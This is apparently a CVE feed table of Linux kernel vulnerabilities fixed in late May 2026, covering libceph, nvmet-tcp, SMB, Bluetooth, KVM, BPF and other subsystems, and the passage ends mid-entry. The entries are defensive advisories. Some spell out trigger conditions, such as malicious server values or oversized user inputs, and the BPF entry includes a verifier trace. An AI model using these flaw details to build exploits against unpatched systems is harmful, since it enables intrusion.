| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: Fix slab-out-of-bounds access in auth message processing If a (potentially corrupted) message of type CEPH_MSG_AUTH_REPLY contains a positive value in its result field, it is treated as an error code by ceph_handle_auth_reply() and returned to handle_auth_reply(). Thereafter, an attempt is made to send the preallocated message of type CEPH_MSG_AUTH, where the returned value is interpreted as the size of the front segment to send. If the result value in the message is greater than the size of the memory buffer allocated for the front segment, an out-of-bounds access occurs, and the content of the memory region beyond this buffer is sent out. This patch fixes the issue by treating only negative values in the result field as errors. Positive values are therefore treated as success in the same way as a zero value. Additionally, a BUG_ON is added to __send_prepared_auth_request() comparing the len parameter to front_alloc_len to prevent sending the message if it exceeds the bounds of the allocation and to make it easier to catch any logic flaws leading to this. | 2026-05-28 | 9.1 | CVE-2026-46119 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvmet-tcp: fix race between ICReq handling and queue teardown nvmet_tcp_handle_icreq() updates queue->state after sending an Initialization Connection Response (ICResp), but it does so without serializing against target-side queue teardown. If an NVMe/TCP host sends an Initialization Connection Request (ICReq) and immediately closes the connection, target-side teardown may start in softirq context before io_work drains the already buffered ICReq. In that case, nvmet_tcp_schedule_release_queue() sets queue->state to NVMET_TCP_Q_DISCONNECTING and drops the queue reference under state_lock. If io_work later processes that ICReq, nvmet_tcp_handle_icreq() can still overwrite the state back to NVMET_TCP_Q_LIVE. That defeats the DISCONNECTING-state guard in nvmet_tcp_schedule_release_queue() and allows a later socket state change to re-enter teardown and issue a second kref_put() on an already released queue. The ICResp send failure path has the same problem. If teardown has already moved the queue to DISCONNECTING, a send error can still overwrite the state with NVMET_TCP_Q_FAILED, again reopening the window for a second teardown path to drop the queue reference. Fix this by serializing both post-send state transitions with state_lock and bailing out if teardown has already started. Use -ESHUTDOWN as an internal sentinel for that bail-out path rather than propagating it as a transport error like -ECONNRESET. Keep nvmet_tcp_socket_error() setting rcv_state to NVMET_TCP_RECV_ERR before honoring that sentinel so receive-side parsing stays quiesced until the existing release path completes. | 2026-05-28 | 9.8 | CVE-2026-46135 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: pm: ADD_ADDR rtx: fix potential data-race This mptcp_pm_add_timer() helper is executed as a timer callback in softirq context. To avoid any data races, the socket lock needs to be held with bh_lock_sock(). If the socket is in use, retry again soon after, similar to what is done with the keepalive timer. | 2026-05-28 | 9.8 | CVE-2026-46137 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb/client: fix out-of-bounds read in smb2_compound_op() If a server sends a truncated response but a large OutputBufferLength, and terminates the EA list early, check_wsl_eas() returns success without validating that the entire OutputBufferLength fits within iov_len. Then smb2_compound_op() does: memcpy(idata->wsl.eas, data[0], size[0]); Where size[0] is OutputBufferLength. If iov_len is smaller than size[0], memcpy can read beyond the end of the rsp_iov allocation and leak adjacent kernel heap memory. | 2026-05-28 | 9.1 | CVE-2026-46155 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb/client: fix out-of-bounds read in symlink_data() Since smb2_check_message() returns success without length validation for the symlink error response, in symlink_data() it is possible for iov->iov_len to be smaller than sizeof(struct smb2_err_rsp). If the buffer only contains the base SMB2 header (64 bytes), accessing err->ErrorContextCount (at offset 66) or err->ByteCount later in symlink_data() will cause an out-of-bounds read. | 2026-05-28 | 9.1 | CVE-2026-46185 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: validate dacloffset before building DACL pointers parse_sec_desc(), build_sec_desc(), and the chown path in id_mode_to_cifs_acl() all add the server-supplied dacloffset to pntsd before proving a DACL header fits inside the returned security descriptor. On 32-bit builds a malicious server can return dacloffset near U32_MAX, wrap the derived DACL pointer below end_of_acl, and then slip past the later pointer-based bounds checks. build_sec_desc() and id_mode_to_cifs_acl() can then dereference DACL fields from the wrapped pointer in the chmod/chown rewrite paths. Validate dacloffset numerically before building any DACL pointer and reuse the same helper at the three DACL entry points. | 2026-05-28 | 9.8 | CVE-2026-46195 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: slip: bound decode() reads against the compressed packet length slhc_uncompress() parses a VJ-compressed TCP header by advancing a pointer through the packet via decode() and pull16(). Neither helper bounds-checks against isize, and decode() masks its return with & 0xffff so it can never return the -1 that callers test for -- those error paths are dead code. A short compressed frame whose change byte requests optional fields lets decode() read past the end of the packet. The over-read bytes are folded into the cached cstate and reflected into subsequent reconstructed packets. Make decode() and pull16() take the packet end pointer and return -1 when exhausted. Add a bounds check before the TCP-checksum read. The existing == -1 tests now do what they were always meant to. | 2026-05-27 | 8.2 | CVE-2026-45843 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Fix race condition during PASID entry replacement The Intel VT-d PASID table entry is 512 bits (64 bytes). When replacing an active PASID entry (e.g., during domain replacement), the current implementation calculates a new entry on the stack and copies it to the table using a single structure assignment. struct pasid_entry *pte, new_pte; pte = intel_pasid_get_entry(dev, pasid); pasid_pte_config_first_level(iommu, &new_pte, ...); *pte = new_pte; Because the hardware may fetch the 512-bit PASID entry in multiple 128-bit chunks, updating the entire entry while it is active (Present bit set) risks a "torn" read. In this scenario, the IOMMU hardware could observe an inconsistent state - partially new data and partially old data - leading to unpredictable behavior or spurious faults. Fix this by removing the unsafe "replace" helpers and following the "clear-then-update" flow, which ensures the Present bit is cleared and the required invalidation handshake is completed before the new configuration is applied. | 2026-05-27 | 8.8 | CVE-2026-45945 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix error handling in rxgk_extract_token() Fix a missing bit of error handling in rxgk_extract_token(): in the event that rxgk_decrypt_skb() returns -ENOMEM, it should just return that rather than continuing on (for anything else, it generates an abort). | 2026-05-27 | 8.1 | CVE-2026-46010 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv4: icmp: validate reply type before using icmp_pointers Extended echo replies use ICMP_EXT_ECHOREPLY as the outbound reply type. That value is outside the range covered by icmp_pointers[], which only describes the traditional ICMP types up to NR_ICMP_TYPES. Avoid consulting icmp_pointers[] for reply types outside that range, and use array_index_nospec() for the remaining in-range lookup. Normal ICMP replies keep their existing behavior unchanged. | 2026-05-27 | 8.2 | CVE-2026-46037 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_event: fix potential UAF in SSP passkey handlers hci_conn lookup and field access must be covered by hdev lock in hci_user_passkey_notify_evt() and hci_keypress_notify_evt(), otherwise the connection can be freed concurrently. Extend the hci_dev_lock critical section to cover all conn usage in both handlers. Keep the existing keypress notification behavior unchanged by routing the early exits through a common unlock path. | 2026-05-27 | 8.8 | CVE-2026-46056 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ipv6: fix NOREF dst use in seg6 and rpl lwtunnels seg6_input_core() and rpl_input() call ip6_route_input() which sets a NOREF dst on the skb, then pass it to dst_cache_set_ip6() invoking dst_hold() unconditionally. On PREEMPT_RT, ksoftirqd is preemptible and a higher-priority task can release the underlying pcpu_rt between the lookup and the caching through a concurrent FIB lookup on a shared nexthop. Simplified race sequence: ksoftirqd/X higher-prio task (same CPU X) ----------- -------------------------------- seg6_input_core(,skb)/rpl_input(skb) dst_cache_get() -> miss ip6_route_input(skb) -> ip6_pol_route(,skb,flags) [RT6_LOOKUP_F_DST_NOREF in flags] -> FIB lookup resolves fib6_nh [nhid=N route] -> rt6_make_pcpu_route() [creates pcpu_rt, refcount=1] pcpu_rt->sernum = fib6_sernum [fib6_sernum=W] -> cmpxchg(fib6_nh.rt6i_pcpu, NULL, pcpu_rt) [slot was empty, store succeeds] -> skb_dst_set_noref(skb, dst) [dst is pcpu_rt, refcount still 1] rt_genid_bump_ipv6() -> bumps fib6_sernum [fib6_sernum from W to Z] ip6_route_output() -> ip6_pol_route() -> FIB lookup resolves fib6_nh [nhid=N] -> rt6_get_pcpu_route() pcpu_rt->sernum != fib6_sernum [W <> Z, stale] -> prev = xchg(rt6i_pcpu, NULL) -> dst_release(prev) [prev is pcpu_rt, refcount 1->0, dead] dst = skb_dst(skb) [dst is the dead pcpu_rt] dst_cache_set_ip6(dst) -> dst_hold() on dead dst -> WARN / use-after-free For the race to occur, ksoftirqd must be preemptible (PREEMPT_RT without PREEMPT_RT_NEEDS_BH_LOCK) and a concurrent task must be able to release the pcpu_rt. Shared nexthop objects provide such a path, as two routes pointing to the same nhid share the same fib6_nh and its rt6i_pcpu entry. Fix seg6_input_core() and rpl_input() by calling skb_dst_force() after ip6_route_input() to force the NOREF dst into a refcounted one before caching. The output path is not affected as ip6_route_output() already returns a refcounted dst. | 2026-05-27 | 8.1 | CVE-2026-46099 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Fix shadow paging use-after-free due to unexpected GFN The shadow MMU computes GFNs for direct shadow pages using sp->gfn plus the SPTE index. This assumption breaks for shadow paging if the guest page tables are modified between VM entries (similar to commit aad885e77496, "KVM: x86/mmu: Drop/zap existing present SPTE even when creating an MMIO SPTE", 2026-03-27). The flow is as follows: - a PDE is installed for a 2MB mapping, and a page in that area is accessed. KVM creates a kvm_mmu_page consisting of 512 4KB pages; the kvm_mmu_page is marked by FNAME(fetch) as direct-mapped because the guest's mapping is a huge page (and thus contiguous). - the PDE mapping is changed from outside the guest. - the guest accesses another page in the same 2MB area. KVM installs a new leaf SPTE and rmap entry; the SPTE uses the "correct" GFN (i.e. based on the new mapping, as changed in the previous step) but that GFN is outside of the [sp->gfn, sp->gfn + 511] range; therefore the rmap entry cannot be found and removed when the kvm_mmu_page is zapped. - the memslot that covers the first 2MB mapping is deleted, and the kvm_mmu_page for the now-invalid GPA is zapped. However, rmap_remove() only looks at the [sp->gfn, sp->gfn + 511] range established in step 1, and fails to find the rmap entry that was recorded by step 3. - any operation that causes an rmap walk for the same page accessed by step 3 then walks a stale rmap and dereferences a freed kvm_mmu_page. This includes dirty logging or MMU notifier invalidations (e.g., from MADV_DONTNEED). The underlying issue is that KVM's walking of shadow PTEs assumes that if a SPTE is present when KVM wants to install a non-leaf SPTE, then the existing kvm_mmu_page must be for the correct gfn. Because the only way for the gfn to be wrong is if KVM messed up and failed to zap a SPTE... which shouldn't happen, but *actually* only happens in response to a guest write. That bug dates back literally forever, as even the first version of KVM assumes that the GFN matches and walks into the "wrong" shadow page. However, that was only an imprecision until 2032a93d66fa ("KVM: MMU: Don't allocate gfns page for direct mmu pages") came along. Fix it by checking for a target gfn mismatch and zapping the existing SPTE. That way the old SP and rmap entries are gone, KVM installs the rmap in the right location, and everyone is happy. | 2026-05-28 | 8.8 | CVE-2026-46113 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: remove station if connection prep fails If connection preparation fails for MLO connections, then the interface is completely reset to non-MLD. In this case, we must not keep the station since it's related to the link of the vif being removed. Delete an existing station. Any "new_sta" is already being removed, so that doesn't need changes. This fixes a use-after-free/double-free in debugfs if that's enabled, because a vif going from MLD (and to MLD, but that's not relevant here) recreates its entire debugfs. | 2026-05-28 | 8.8 | CVE-2026-46125 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_event: Fix OOB read and infinite loop in hci_le_create_big_complete_evt hci_le_create_big_complete_evt() iterates over BT_BOUND connections for a BIG handle using a while loop, accessing ev->bis_handle[i++] on each iteration. However, there is no check that i stays within ev->num_bis before the array access. When a controller sends a LE_Create_BIG_Complete event with fewer bis_handle entries than there are BT_BOUND connections for that BIG, or with num_bis=0, the loop reads beyond the valid bis_handle[] flex array into adjacent heap memory. Since the out-of-bounds values typically exceed HCI_CONN_HANDLE_MAX (0x0EFF), hci_conn_set_handle() rejects them and the connection remains in BT_BOUND state. The same connection is then found again by hci_conn_hash_lookup_big_state(), creating an infinite loop with hci_dev_lock held. Fix this by terminating the BIG in case not all BIS could be set up properly. | 2026-05-28 | 8.1 | CVE-2026-46138 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: drop stray 'static' from fast-RX rx_result ieee80211_invoke_fast_rx() is documented as safe for parallel RX, but its per-invocation rx_result is declared static. Concurrent callers then share one instance and can overwrite each other's result between ieee80211_rx_mesh_data() and the switch on res. That can make a packet that was queued or consumed by ieee80211_rx_mesh_data() fall through into ieee80211_rx_8023(), or make a packet that should continue return as queued. Make res an automatic variable so each invocation keeps its own result. | 2026-05-28 | 8.8 | CVE-2026-46152 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: use safe list iteration in radar detect work The call to ieee80211_dfs_cac_cancel can cause the iterated chanctx to be freed and removed from the list. Guard against this to avoid a slab-use-after-free error. | 2026-05-28 | 8.8 | CVE-2026-46166 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/CPU/AMD: Prevent improper isolation of shared resources in Zen2's op cache Make sure resources are not improperly shared in the op cache and cause instruction corruption this way. | 2026-05-28 | 8.8 | CVE-2026-46174 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: fix integer overflow on buff_pos Fixing an integer overflow present in batadv_iv_ogm_send_to_if. The size check is done using the int type in batadv_iv_ogm_aggr_packet whereas the buff_pos variable uses the s16 type. This could lead to an out-of-bound read. | 2026-05-28 | 8.8 | CVE-2026-46198 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: bla: prevent use-after-free when deleting claims When batadv_bla_del_backbone_claims() removes all claims for a backbone, it does this by dropping the link entry in the hash list. This list entry itself was one of the references which need to be dropped at the same time via batadv_claim_put(). But the batadv_claim_put() must not be done before the last access to the claim object in this function. Otherwise the claim might be freed already by the batadv_claim_release() function before the list entry was dropped. | 2026-05-28 | 8.8 | CVE-2026-46212 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: playstation: Clamp num_touch_reports A device would never lie about the number of touch reports would it? If it does the loop in dualshock4_parse_report will read off the end of the touch_reports array, up to about 2 KiB for the maximum number of 256 loop iterations. The data that is read is emitted via evdev if the DS4_TOUCH_POINT_INACTIVE bit happens to be set. Protect against this by clamping the num_touch_reports value provided by the device to the maximum size of the touch_reports array. | 2026-05-28 | 8.1 | CVE-2026-46232 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: stop caching unowned originator pointers in BAT IV BAT IV keeps the last-hop neighbor address in each neigh_node, but some paths also cache an originator pointer derived from a temporary lookup. That pointer is not owned by the neigh_node and may no longer refer to a live originator entry after purge handling runs. Stop storing the auxiliary originator pointer in the BAT IV neighbor state. When BAT IV needs the neighbor originator data, resolve it from the stored neighbor address and drop the reference again after use. [sven: avoid bonding logic for outgoing OGM] | 2026-05-28 | 8.8 | CVE-2026-46238 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix double free in rxe_srq_from_init In rxe_srq_from_init(), the queue pointer 'q' is assigned to 'srq->rq.queue' before copying the SRQ number to user space. If copy_to_user() fails, the function calls rxe_queue_cleanup() to free the queue, but leaves the now-invalid pointer in 'srq->rq.queue'. The caller of rxe_srq_from_init() (rxe_create_srq) eventually calls rxe_srq_cleanup() upon receiving the error, which triggers a second rxe_queue_cleanup() on the same memory, leading to a double free. The call trace looks like this: kmem_cache_free+0x.../0x... rxe_queue_cleanup+0x1a/0x30 [rdma_rxe] rxe_srq_cleanup+0x42/0x60 [rdma_rxe] rxe_elem_release+0x31/0x70 [rdma_rxe] rxe_create_srq+0x12b/0x1a0 [rdma_rxe] ib_create_srq_user+0x9a/0x150 [ib_core] Fix this by moving 'srq->rq.queue = q' after copy_to_user. | 2026-05-27 | 7.8 | CVE-2026-45852 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/uverbs: Validate wqe_size before using it in ib_uverbs_post_send ib_uverbs_post_send() uses cmd.wqe_size from userspace without any validation before passing it to kmalloc() and using the allocated buffer as struct ib_uverbs_send_wr. If a user provides a small wqe_size value (e.g., 1), kmalloc() will succeed, but subsequent accesses to user_wr->opcode, user_wr->num_sge, and other fields will read beyond the allocated buffer, resulting in an out-of-bounds read from kernel heap memory. This could potentially leak sensitive kernel information to userspace. Additionally, providing an excessively large wqe_size can trigger a WARNING in the memory allocation path, as reported by syzkaller. This is inconsistent with ib_uverbs_unmarshall_recv() which properly validates that wqe_size >= sizeof(struct ib_uverbs_recv_wr) before proceeding. Add the same validation for ib_uverbs_post_send() to ensure wqe_size is at least sizeof(struct ib_uverbs_send_wr). | 2026-05-27 | 7.1 | CVE-2026-45856 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_queue: do shared-unconfirmed check before segmentation Ulrich reports a regression with nfqueue: If an application did not set the 'F_GSO' capability flag and a gso packet with an unconfirmed nf_conn entry is received all packets are now dropped instead of queued, because the check happens after skb_gso_segment(). In that case, we did have exclusive ownership of the skb and its associated conntrack entry. The elevated use count is due to skb_clone happening via skb_gso_segment(). Move the check so that it is performed vs. the aggregated packet. Then, annotate the individual segments except the first one so we can do a 2nd check at reinject time. For the normal case, where userspace does in-order reinjects, this avoids packet drops: first reinjected segment continues traversal and confirms entry, remaining segments observe the confirmed entry. While at it, simplify nf_ct_drop_unconfirmed(): We only care about unconfirmed entries with a refcnt > 1, there is no need to special-case dying entries. This only happens with UDP. With TCP, the only unconfirmed packet will be the TCP SYN, those aren't aggregated by GRO. Next patch adds a udpgro test case to cover this scenario. | 2026-05-27 | 7.5 | CVE-2026-45859 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conncount: increase the connection clean up limit to 64 After the optimization to only perform one GC per jiffy, a new problem was introduced. If more than 8 new connections are tracked per jiffy the list won't be cleaned up fast enough possibly reaching the limit wrongly. In order to prevent this issue, only skip the GC if it was already triggered during the same jiffy and the increment is lower than the clean up limit. In addition, increase the clean up limit to 64 connections to avoid triggering GC too often and do more effective GCs. This has been tested using a HTTP server and several performance tools while having nft_connlimit/xt_connlimit or OVS limit configured. Output of slowhttptest + OVS limit at 52000 connections: slow HTTP test status on 340th second: initializing: 0 pending: 432 connected: 51998 error: 0 closed: 0 service available: YES | 2026-05-27 | 7.5 | CVE-2026-45860 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gfs2: Fix slab-use-after-free in qd_put Commit a475c5dd16e5 ("gfs2: Free quota data objects synchronously") started freeing quota data objects during filesystem shutdown instead of putting them back onto the LRU list, but it failed to remove these objects from the LRU list, causing LRU list corruption. This caused use-after-free when the shrinker (gfs2_qd_shrink_scan) tried to access already-freed objects on the LRU list. Fix this by removing qd objects from the LRU list before freeing them in qd_put(). Initial fix from Deepanshu Kartikey <kartikey406@gmail.com>. | 2026-05-27 | 7.8 | CVE-2026-45861 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Flush cache for PASID table before using it When writing the address of a freshly allocated zero-initialized PASID table to a PASID directory entry, do that after the CPU cache flush for this PASID table, not before it, to avoid the time window when this PASID table may be already used by non-coherent IOMMU hardware while its contents in RAM is still some random old data, not zero-initialized. | 2026-05-27 | 7.8 | CVE-2026-45862 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Fix watch_id bounds checking in debug address watch v2 The address watch clear code receives watch_id as an unsigned value (u32), but some helper functions were using a signed int and checked bits by shifting with watch_id. If a very large watch_id is passed from userspace, it can be converted to a negative value. This can cause invalid shifts and may access memory outside the watch_points array. drm/amdkfd: Fix watch_id bounds checking in debug address watch v2 Fix this by checking that watch_id is within MAX_WATCH_ADDRESSES before using it. Also use BIT(watch_id) to test and clear bits safely. This keeps the behavior unchanged for valid watch IDs and avoids undefined behavior for invalid ones. Fixes the below: drivers/gpu/drm/amd/amdgpu/../amdkfd/kfd_debug.c:448 kfd_dbg_trap_clear_dev_address_watch() error: buffer overflow 'pdd->watch_points' 4 <= u32max user_rl='0-3,2147483648-u32max' uncapped drivers/gpu/drm/amd/amdgpu/../amdkfd/kfd_debug.c 433 int kfd_dbg_trap_clear_dev_address_watch(struct kfd_process_device *pdd, 434 uint32_t watch_id) 435 { 436 int r; 437 438 if (!kfd_dbg_owns_dev_watch_id(pdd, watch_id)) kfd_dbg_owns_dev_watch_id() doesn't check for negative values so if watch_id is larger than INT_MAX it leads to a buffer overflow. (Negative shifts are undefined). 439 return -EINVAL; 440 441 if (!pdd->dev->kfd->shared_resources.enable_mes) { 442 r = debug_lock_and_unmap(pdd->dev->dqm); 443 if (r) 444 return r; 445 } 446 447 amdgpu_gfx_off_ctrl(pdd->dev->adev, false); --> 448 pdd->watch_points[watch_id] = pdd->dev->kfd2kgd->clear_address_watch( 449 pdd->dev->adev, 450 watch_id); v2: (as per, Jonathan Kim) - Add early watch_id >= MAX_WATCH_ADDRESSES validation in the set path to match the clear path. - Drop the redundant bounds check in kfd_dbg_owns_dev_watch_id(). | 2026-05-27 | 7.8 | CVE-2026-45878 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Clear Present bit before tearing down PASID entry The Intel VT-d Scalable Mode PASID table entry consists of 512 bits (64 bytes). When tearing down an entry, the current implementation zeros the entire 64-byte structure immediately using multiple 64-bit writes. Since the IOMMU hardware may fetch these 64 bytes using multiple internal transactions (e.g., four 128-bit bursts), updating or zeroing the entire entry while it is active (P=1) risks a "torn" read. If a hardware fetch occurs simultaneously with the CPU zeroing the entry, the hardware could observe an inconsistent state, leading to unpredictable behavior or spurious faults. Follow the "Guidance to Software for Invalidations" in the VT-d spec (Section 6.5.3.3) by implementing the recommended ownership handshake: 1. Clear only the 'Present' (P) bit of the PASID entry. 2. Use a dma_wmb() to ensure the cleared bit is visible to hardware before proceeding. 3. Execute the required invalidation sequence (PASID cache, IOTLB, and Device-TLB flush) to ensure the hardware has released all cached references. 4. Only after the flushes are complete, zero out the remaining fields of the PASID entry. Also, add a dma_wmb() in pasid_set_present() to ensure that all other fields of the PASID entry are visible to the hardware before the Present bit is set. | 2026-05-27 | 7.8 | CVE-2026-45894 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: mediatek: Drop __initconst from gates Since commit 8ceff24a754a ("clk: mediatek: clk-gate: Refactor mtk_clk_register_gate to use mtk_gate struct") the mtk_gate structs are no longer just used for initialization/registration, but also at runtime. So drop __initconst annotations. | 2026-05-27 | 7.8 | CVE-2026-45909 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix race condition in QP timer handlers I encountered the following warning: WARNING: drivers/infiniband/sw/rxe/rxe_task.c:249 at rxe_sched_task+0x1c8/0x238 [rdma_rxe], CPU#0: swapper/0/0 ... libsha1 [last unloaded: ip6_udp_tunnel] CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Tainted: G C 6.19.0-rc5-64k-v8+ #37 PREEMPT Tainted: [C]=CRAP Hardware name: Raspberry Pi 4 Model B Rev 1.2 Call trace: rxe_sched_task+0x1c8/0x238 [rdma_rxe] (P) retransmit_timer+0x130/0x188 [rdma_rxe] call_timer_fn+0x68/0x4d0 __run_timers+0x630/0x888 ... WARNING: drivers/infiniband/sw/rxe/rxe_task.c:38 at rxe_sched_task+0x1c0/0x238 [rdma_rxe], CPU#0: swapper/0/0 ... WARNING: drivers/infiniband/sw/rxe/rxe_task.c:111 at do_work+0x488/0x5c8 [rdma_rxe], CPU#3: kworker/u17:4/93400 ... refcount_t: underflow; use-after-free. WARNING: lib/refcount.c:28 at refcount_warn_saturate+0x138/0x1a0, CPU#3: kworker/u17:4/93400 The issue is caused by a race condition between retransmit_timer() and rxe_destroy_qp, leading to the Queue Pair's (QP) reference count dropping to zero during timer handler execution. It seems this warning is harmless because rxe_qp_do_cleanup() will flush all pending timers and requests. Example of flow causing the issue: CPU0 CPU1 retransmit_timer() { spin_lock_irqsave rxe_destroy_qp() __rxe_cleanup() __rxe_put() // qp->ref_count decrease to 0 rxe_qp_do_cleanup() { if (qp->valid) { rxe_sched_task() { WARN_ON(rxe_read(task->qp) <= 0); } } spin_unlock_irqrestore } spin_lock_irqsave qp->valid = 0 spin_unlock_irqrestore } Ensure the QP's reference count is maintained and its validity is checked within the timer callbacks by adding calls to rxe_get(qp) and corresponding rxe_put(qp) after use. | 2026-05-27 | 7.8 | CVE-2026-45910 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ovpn: fix possible use-after-free in ovpn_net_xmit When building the skb_list in ovpn_net_xmit, skb_share_check will free the original skb if it is shared. The current implementation continues to use the stale skb pointer for subsequent operations: - peer lookup, - skb_dst_drop (even though all segments produced by skb_gso_segment will have a dst attached), - ovpn_peer_stats_increment_tx. Fix this by moving the peer lookup and skb_dst_drop before segmentation so that the original skb is still valid when used. Return early if all segments fail skb_share_check and the list ends up empty. Also switch ovpn_peer_stats_increment_tx to use skb_list.next; the next patch fixes the stats logic. | 2026-05-27 | 7.8 | CVE-2026-45929 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Hold mm structure across iommu_sva_unbind_device() Some tests trigger a crash in iommu_sva_unbind_device() due to accessing iommu_mm after the associated mm structure has been freed. Fix this by taking an explicit reference to the mm structure after successfully binding the device, and releasing it only after the device is unbound. This ensures the mm remains valid for the entire SVA bind/unbind lifetime. | 2026-05-27 | 7.8 | CVE-2026-45931 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix tcx/netkit detach permissions when prog fd isn't given This commit fixes a security issue where BPF_PROG_DETACH on tcx or netkit devices could be executed by any user when no program fd was provided, bypassing permission checks. The fix adds a capability check for CAP_NET_ADMIN or CAP_SYS_ADMIN in this case. | 2026-05-27 | 7.3 | CVE-2026-45932 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Preserve id of register in sync_linked_regs() sync_linked_regs() copies the id of known_reg to reg when propagating bounds of known_reg to reg using the off of known_reg, but when known_reg was linked to reg like: known_reg = reg ; both known_reg and reg get same id known_reg += 4 ; known_reg gets off = 4, and its id gets BPF_ADD_CONST now when a call to sync_linked_regs() happens, let's say with the following: if known_reg >= 10 goto pc+2 known_reg's new bounds are propagated to reg but now reg gets BPF_ADD_CONST from the copy. This means if another link to reg is created like: another_reg = reg ; another_reg should get the id of reg but assign_scalar_id_before_mov() sees BPF_ADD_CONST on reg and assigns a new id to it. As reg has a new id now, known_reg's link to reg is broken. If we find new bounds for known_reg, they will not be propagated to reg. This can be seen in the selftest added in the next commit: 0: (85) call bpf_get_prandom_u32#7 ; R0=scalar() 1: (57) r0 &= 255 ; R0=scalar(smin=smin32=0,smax=umax=smax32=umax32=255,var_off=(0x0; 0xff)) 2: (bf) r1 = r0 ; R0=scalar(id=1,smin=smin32=0,smax=umax=smax32=umax32=255,var_off=(0x0; 0xff)) R1=scalar(id=1,smin=smin32=0,smax=umax=smax32=umax32=255,var_off=(0x0; 0xff)) 3: (07) r1 += 4 ; R1=scalar(id=1+4,smin=umin=smin32=umin32=4,smax=umax=smax32=umax32=259,var_off=(0x0; 0x1ff)) 4: (a5) if r1 < 0xa goto pc+4 ; R1=scalar(id=1+4,smin=umin=smin32=umin32=10,smax=umax=smax32=umax32=259,var_off=(0x0; 0x1ff)) 5: (bf) r2 = r0 ; R0=scalar(id=2,smin=umin=smin32=umin32=6,smax=umax=smax32=umax32=255) R2=scalar(id=2,smin=umin=smin32=umin32=6,smax=umax=smax32=umax32=255) 6: (a5) if r1 < 0xe goto pc+2 ; R1=scalar(id=1+4,smin=umin=smin32=umin32=14,smax=umax=smax32=umax32=259,var_off=(0x0; 0x1ff)) 7: (35) if r0 >= 0xa goto pc+1 ; R0=scalar(id=2,smin=umin=smin32=umin32=6,smax=umax=smax32=umax32=9,var_off=(0x0; 0xf)) 8: (37) r0 /= 0 div by zero When 4 is verified, r1's bounds are propagated to r0 but r0 also gets BPF_ADD_CONST (bug). When 5 is verified, r0 gets a new id (2) and its link with r1 is broken. After 6 we know r1 has bounds [14, 259] and therefore r0 should have bounds [10, 255], therefore the branch at 7 is always taken. But because r0's id was changed to 2, r1's new bounds are not propagated to r0. The verifier still thinks r0 has bounds [6, 255] before 7 and execution can reach div by zero. Fix this by preserving id in sync_linked_regs() like off and subreg_def. | 2026-05-27 | 7.8 | CVE-2026-45933 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix slab-out-of-bounds read in DeleteIndexEntryRoot In the 'DeleteIndexEntryRoot' case of the 'do_action' function, the entry size ('esize') is retrieved from the log record without adequate bounds checking. Specifically, the code calculates the end of the entry ('e2') using: e2 = Add2Ptr(e1, esize); It then calculates the size for memmove using 'PtrOffset(e2, ...)', which subtracts the end pointer from the buffer limit. If 'esize' is maliciously large, 'e2' exceeds the used buffer size. This results in a negative offset which, when cast to size_t for memmove, interprets as a massive unsigned integer, leading to a heap buffer overflow. This commit adds a check to ensure that the entry size ('esize') strictly fits within the remaining used space of the index header before performing memory operations. | 2026-05-27 | 7.8 | CVE-2026-45935 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix e4b bitmap inconsistency reports A bitmap inconsistency issue was observed during stress tests under mixed huge-page workloads. Ext4 reported multiple e4b bitmap check failures like: ext4_mb_complex_scan_group:2508: group 350, 8179 free clusters as per group info. But got 8192 blocks Analysis and experimentation confirmed that the issue is caused by a race condition between page migration and bitmap modification. Although this timing window is extremely narrow, it is still hit in practice: folio_lock ext4_mb_load_buddy __migrate_folio check ref count folio_mc_copy __filemap_get_folio folio_try_get(folio) ...... mb_mark_used ext4_mb_unload_buddy __folio_migrate_mapping folio_ref_freeze folio_unlock The root cause of this issue is that the fast path of load_buddy only increments the folio's reference count, which is insufficient to prevent concurrent folio migration. We observed that the folio migration process acquires the folio lock. Therefore, we can determine whether to take the fast path in load_buddy by checking the lock status. If the folio is locked, we opt for the 